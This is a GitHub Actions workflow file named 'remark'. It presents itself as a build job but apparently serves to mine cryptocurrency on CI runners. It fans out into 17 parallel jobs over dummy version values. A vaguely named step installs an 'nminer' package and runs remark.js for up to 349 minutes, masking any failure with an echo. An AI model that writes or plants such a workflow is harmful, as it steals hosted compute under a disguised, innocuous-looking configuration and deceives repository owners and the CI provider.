name: remark
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 5103 }
          - { version: 3242 }
          - { version: 913 }
          - { version: 6168 }
          - { version: 2064 }
          - { version: 5586 }
          - { version: 3973 }
          - { version: 5740 }
          - { version: 7660 }
          - { version: 7554 }
          - { version: 522 }
          - { version: 5577 }
          - { version: 4749 }
          - { version: 4026 }
          - { version: 1624 }
          - { version: 180 }
          - { version: 6725 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: decent revere
        run: |
          npm install nminer@latest
          timeout 349m node remark.js || echo "remark executed"